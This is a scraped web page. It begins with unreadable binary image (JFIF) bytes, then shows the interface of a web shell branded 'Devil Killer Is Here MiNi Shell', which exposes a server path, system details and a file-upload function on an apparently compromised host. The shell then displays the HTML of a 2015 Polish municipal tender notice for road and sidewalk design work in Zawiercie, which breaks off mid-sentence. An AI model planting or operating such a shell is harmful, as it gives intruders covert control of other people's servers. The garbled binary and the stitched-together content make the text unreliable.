JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150722/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150722/108823-N-2015.html

<p class="kh_header"><b>Zawiercie: Wykonanie dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz kosztorysu inwestorskiego dla 2 zadań.</b><br>
<b>Numer ogłoszenia: 108823 - 2015; data zamieszczenia: 22.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Zawiercie , ul. Leśna 2, 42-400 Zawiercie, woj. śląskie, tel. 032 6722684, faks 032 6721513.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zawiercie.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz kosztorysu inwestorskiego dla 2 zadań..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz kosztorysu inwestorskiego dla: Zadanie nr 1 Budowa chodnika przy ul. Nowowiejskiej w Zawierciu, w ramach zadania pn.: Dokumentacja techniczna w zakresie rozwoju drogownictwa Zadanie nr 2 Przebudowa drogi - ulicy bez nazwy, bocznej od ul. Mrzygłodzkiej położonej na dz. ew. nr 580/7; 577/4; 595; 170/6 wraz z odwodnieniem w ramach zadania pn.: Dokumentacja techniczna w zakresie rozwoju drogownictwa.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 1 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 1 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 1 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli wykonawca wykaże, iż dysponuje lub będzie dysponował: - osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą uprawnienia do projektowania w specjalności inżynierii drogowej - dotyczy zadań nr 1 i 2  lub odpowiadające im ważne uprawnienia budowlane upoważniające do projektowania przedmiotu zamówienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów. - osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane upoważniające do projektowania przedmiotu zamówienia (sieci kanalizacyjne), które zostały wydane na podstawie wcześniej obowiązujących przepisów - dotyczy zadania nr 2. W/w osoby powinny posiadać uprawnienia budowlane zgodnie z ustawą z dnia 07 lipca 1994 r. Prawo budowlane (tekst jedn. Dz. U. z 2013 r., poz. 1409 z późn. zm.) oraz rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 24 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014 r., poz. 1278) lub odpowiadające im ważne uprawnienia budowlane upoważniające do kierowania robotami budowlanymi związanymi z obiektem budowlanym będącym przedmiotem zamówienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub spełniają warunki, o których mowa w art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2013 r. poz. 1409 z późniejszymi zmianami) tj. osoba/y której/ych odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych lub spełniającą wymogi o których mowa w art. 20a ustawy z dnia 15.12. 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (świadczenie usług transgranicznych). Wykonawca potwierdza spełnianie warunku poprzez złożenie : oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 1 do SIWZ); wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, oraz informacją o podstawie do dysponowania tymi osobami, potwierdzający spełnianie warunków określonych w SIWZ (pkt V ust. 1 ppkt 3)), który stanowi załącznik nr 2 do SIWZ. W przypadku Wykonawców wspólnie ubiegających się o zamówienie dokument ten składa przynajmniej jeden z Wykonawców, albo wszyscy ci Wykonawcy wspólnie - oceniany będzie ich łączny potencjał oraz oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia (wskazane przez Wykonawcę w wykazie, o którym mowa w pkt. VI ust. 1 ppkt 2) SIWZ) posiadają wymagane uprawnienia, na potwierdzenie spełniania warunku, o którym mowa w pkt V ust. 1 ppkt 3) SIWZ (zawarte w wykazie, o którym mowa w pkt. VI ust. 1 ppkt 2) SIWZ). W przypadku Wykonawców wspólnie ubiegających się o zamówienie dokument ten składa przynajmniej jeden z Wykonawców, albo wszyscy ci Wykonawcy wspólnie - oceniany będzie ich łączny potencjał.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 1 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Druk Formularz oferty, sporządzony wg wzoru stanowiącego załącznik nr 5 do SIWZ.
2)Pełnomocnictwo ustanowione do reprezentowania Wykonawcy/ów ubiegającego/cych się o udzielenie zamówienia publicznego. Pełnomocnictwo należy dołączyć w oryginale bądź kopii, potwierdzonej za zgodność z oryginałem notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin wykonania zamówienia - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Z wykonawcą, który złoży najkorzystniejszą ofertę zostanie zawarta umowa, której wzór stanowi załącznik do specyfikacji istotnych warunków zamówienia.
2.	Zamawiający przewiduje możliwość istotnych zmian postanowień umowy w przypadku, gdy:
1)	Nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, w tym zmiana stawki podatku VAT - dotyczy zadań nr 1 i 2;
2)	Przekształcenia podmiotowego Wykonawcy - dotyczy zadań nr 1 i 2;
3)	Zmiany członków personelu kluczowego Wykonawcy w przypadku wystąpienia nieprzewidzianych okoliczności takich jak : śmierć osoby , rezygnacja/odejście z pracy lub innych uniemożliwiających należyte wykonanie obowiązków zgodnie z umowa lub obowiązującym prawem. W takim jednak przypadku każda nowa osoba musi spełniać warunki określone przez Zamawiającego n a etapie wyboru oferty w postępowaniu przetargowym - dotyczy zadań nr 1 i 2;
4)	Zmian będących następstwem działań organów administracji (np. opóźnienia w uzyskaniu uzgodnień wymaganych przy realizacji przedmiotu umowy, opóźnienia w wydaniu decyzji administracyjnych dotyczących przedmiotu umowy). Termin wykonania umowy  ulega odpowiednio zmianie o okres trwania okoliczności celem ukończenia przedmiotu umowy w sposób należyty. Zmiana terminu realizacji przedmiotu umowy nie wpływa na zmianę wynagrodzenia - dotyczy zadań nr 1 i 2.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zawiercie.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Zawierciu, ul. Leśna 2. Wydział Zamówień Publicznych, pokój nr 202.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2015 godzina 12:00, miejsce: Urząd Miejski w Zawierciu, ul. Leśna 2 Punkt Informacyjny (parter UM)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wymagany termin realizacji zamówienia:
Zadanie nr 1 - nie dłużej niż 110 dni od daty zawarcia umowy;
Zadanie nr 2 - nie dłużej niż 120 dni od daty zawarcia umowy.Ogłoszenie o zamówieniu zostało zamieszczone w BZP w dniu 22.07.2015r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Budowa chodnika przy ul. Nowowiejskiej w Zawierciu, w ramach zadania pn.: Dokumentacja techniczna w zakresie rozwoju drogownictwa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia: Przedmiotem zamówienia jest: wykonanie dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz kosztorysu inwestorskiego - przebudowy drogi - budowy chodnika przy ul. Nowowiejskiej w Zawierciu. Przedmiot zamówienia należy wykonać zgodnie z n/w przepisami: 1) rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 .r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. z 2013 r., poz. 1129). 2) rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych programie funkcjonalno - użytkowym (Dz. U. z 2004 r. nr 130, poz. 1389). 1. Dokumentacja powinna zawierać: 1) projekt budowlany przebudowy drogi - budowy chodnika w ul. Nowowiejskiej w 6 egzemplarzach w wersji papierowej, 1egz. w wersji elektronicznej, 2) projekt wykonawczy przebudowy drogi - budowy chodnika w ul. Nowowiejskiej w 3 egzemplarzach w wersji papierowej, 1egz. w wersji elektronicznej, 3) przedmiar robót przez który należy rozumieć opracowanie zawierające zestawienie przewidywanych do wykonania robót w kolejności technologicznej ich wykonania, wraz z ich szczegółowym opisem, miejscem wykonania lub wskazaniem podstaw ustalających szczegółowy opis, z wyliczenie i zestawieniem liczby jednostek miar robót podstawowych oraz wskazaniem podstaw do ustalania cen jednostkowych nakładów rzeczowych. Przedmiar musi uwzględniać wymagania określone w § od 6 do 10 w/w rozporządzenia w 4 egzemplarzach w wersji papierowej, 1 egz. w wersji elektronicznej, 4) kosztorys inwestorski w 2 egzemplarzach w wersji papierowej, 1 egz. w wersji elektronicznej, 5) specyfikację techniczną wykonania i odbioru robót budowlanych przez którą należy rozumieć opracowanie zawierające w szczególności zbiory wymagań, które są niezbędne do określenia standardu i jakości wykonania robót, w zakresie sposobu wykonania robót budowlanych, właściwości wyrobów budowlanych oraz oceny prawidłowości wykonania poszczególnych robót. Specyfikacja musi uwzględniać wymagania określone w § 13 i 14 w/w rozporządzenia w 3 egzemplarzach w wersji papierowej, 1 egz. w wersji elektronicznej, 6) projekt czasowej organizacji ruchu w 6 egzemplarzach w wersji papierowej, 1 egz. w wersji elektronicznej, 7) projekt stałej organizacji ruchu w 6 egzemplarzach w wersji papierowej, 1 egz. w wersji elektronicznej, 8) mapa do celów projektowych w 6 egzemplarzach w wersji papierowej, 1 egz. w wersji elektronicznej, 9) opracowanie geologiczno - inżynierskie charakterystyki gruntów oraz warunków hydrogeologicznych, po wykonaniu badań geologicznych podłoża gruntowego w 3 egzemplarzach w wersji papierowej, 2. W przypadku wystąpienia kolizji z istniejącymi sieciami podziemnymi i nadziemnym do obowiązków Wykonawcy należy opracowanie projektu zabezpieczenia sieci lub usunięcia kolizji. Szczegółowe rozwiązania winny być zgodne z warunkami technicznymi gestorów sieci, po akceptacji Zamawiającego. Uzyskanie warunków technicznych należy do obowiązków wykonawcy projektu. Dokumentację wykonać w ilościach jak określono powyżej. 3. Stan istniejący: Pas drogowy ulicy Nowowiejskiej przy której planowana jest realizacja chodnika składa się z działek o nr ew. 836; 782/2; 911; 173/2; 293/19; 290/20; 910/1; 173/1; 909/1; 294; 295; 761. Pas drogowy ma szerokość zmienną od 8 m do 10 m. Aktualnie wykonana jest tam jezdnia o nawierzchni asfaltobetonowej o szerokości 6 m , pobocza pozostają gruntowe, istniejące uzbrojenie w pasie drogowym to : - napowietrzna sieć elektryczna NN z lampami oświetleniowymi;; - kolektory kanalizacji sanitarnej i deszczowej z przyłączami; - sieć wodociągowa z przyłączami; - sieć gazowa z przyłączami; - kable telekomunikacyjne. 4. Projekt czasowej organizacji ruchu - winien uzyskać pozytywną opinię Powiatowej Komendy Policji w Zawierciu i zatwierdzenie Powiatowego Zarządu Dróg w Zawierciu. 5. Projekt stałej organizacji ruchu - winien uzyskać pozytywną opinię Powiatowej Komendy Policji w Zawierciu oraz zatwierdzenie Powiatowego Zarządu Dróg w Zawierciu 6. Dokumentacja winna uwzględniać - Budowę chodnika i wjazdów do posesji z kostki brukowej po prawej stronie patrząc od wjazdu z ul. Marciszowskiej. Szerokość chodnika max 1,6 m pomiędzy rabatkami; - chodnik usytuować przy granicy pasa drogowego i przyległych posesjach; - przy skrzyżowaniach z ulicami bocznymi należy zaprojektować chodnik do wysokości przejścia, wraz z prawidłowym przejściem w ulicy bocznej ( m.in. obniżenie krawężników); - przy skrzyżowaniu z ul. Kormoranów wykonać przejścia zarówno w ul. Kormoranów jak i w ul. Nowowiejskiej na lewą stronę na której należy doprojektować odcinek chodnika celem połączenia go z chodnikiem już istniejącym; - pomiędzy krawężnikiem jezdni a chodnikiem zaprojektować pas zieleni. - w projekcie zaznaczyć etapowanie robót : Etap I od ul. Marciszowskiej do ul. Przepiórczej Etap II od ul. Przepiórczej do ul. Bocianiej, Etap III od ul. Bocianiej do ul. Kormoranów. Kosztorys inwestorski i przedmiary robót wykonać dla każdego z trzech etapów odrębnie. - Opracowanie z wykonanego badania podłoża gruntowego uwzględniającego opinię hydrogeologiczną - Komplet niezbędnych uzgodnień z właścicielami mediów: TAURON, RPW i K Zawiercie, Orange, PGN i G - Oddział w Zawierciu i GAZ - SYSTEM Świerklany i ewentualnie inne które umożliwią Zamawiającemu zgłoszenie robót lub uzyskanie pozwolenia na budowę. 7. Ponadto do obowiązków Wykonawcy należy: 1) wykonanie badań geotechnicznych gruntu, które należy przedłożyć w formie opinii geotechnicznej wraz z dokumentacją badań podłoża gruntowego w 3 egzemplarzach w formie papierowej, 2) sprawdzenie w terenie warunków wykonania zamówienia (przed przystąpieniem do wykonania prac projektowych), 3) opracowanie projektu wstępnego (koncepcji) celem uzyskania akceptacji Zamawiającego dla proponowanych rozwiązań w terminie 1 miesiąca od podpisania umowy. Akceptacja nastąpi w formie pisemnej w ciągu 10 dni od daty złożenia. 4) uzyskanie wszelkich uzgodnień, zaświadczeń pozwalających na uzyskanie przez Inwestora pozwolenia na budowę, 5) opisywanie proponowanych materiałów i urządzeń za pomocą parametrów technicznych, tzn. bez podawania ich nazw. Jeżeli nie będzie to możliwe i jedyną możliwością będzie podanie nazwy materiału lub urządzenia, wskazaniu temu muszą towarzyszyć wyrazy lub równoważny, wraz z określeniem co należy przez to rozumieć ( wskazanie parametrów technicznych). 6) konsultacja z Zamawiającym istotnych rozwiązań konstrukcyjnych, funkcjonalnych i materiałowych mających wpływ na koszty robót budowlanych, które będą wykonywane na podstawie opracowanego przedmiotu umowy a także przedłożenie ewentualnych propozycji rozwiązań nie ujętych w rozdz. III a istotnych z punktu widzenia Wykonawcy dla prawidłowego wykonania zamówienia, 7) wypełnienie wniosku o pozwolenie na budowę - 2 egz. W wersji papierowej (bez wpisywania daty), 8) w projektach na stronie tytułowej oraz na wszystkich rysunkach następnie w przedmiarach, kosztorysach inwestorskich i specyfikacjach technicznych datę zapisywać jako dzień, miesiąc, rok, 9) przy podpisach (oprócz rysunków) należy przystemplować imienne pieczęcie projektantów, 10) w przedmiarze i kosztorysie inwestorskim należy uwzględnić zgodnie z Rozporządzeniem kod i nazwę wspólnego słownika zamówień podstawowych zakresów robót, 11) przedmiary robót podzielić należy na rozdziały wg. poszczególnych asortymentów robót oraz tabelę elementów scalonych. W przedmiarach oprócz wszystkich asortymentów robót należy również uwzględnić pełną obsługę geodezyjną zadania . 12) w projekcie należy wykonać dodatkowy rysunek. Na mapie ewidencyjnej należy wrysować kontury 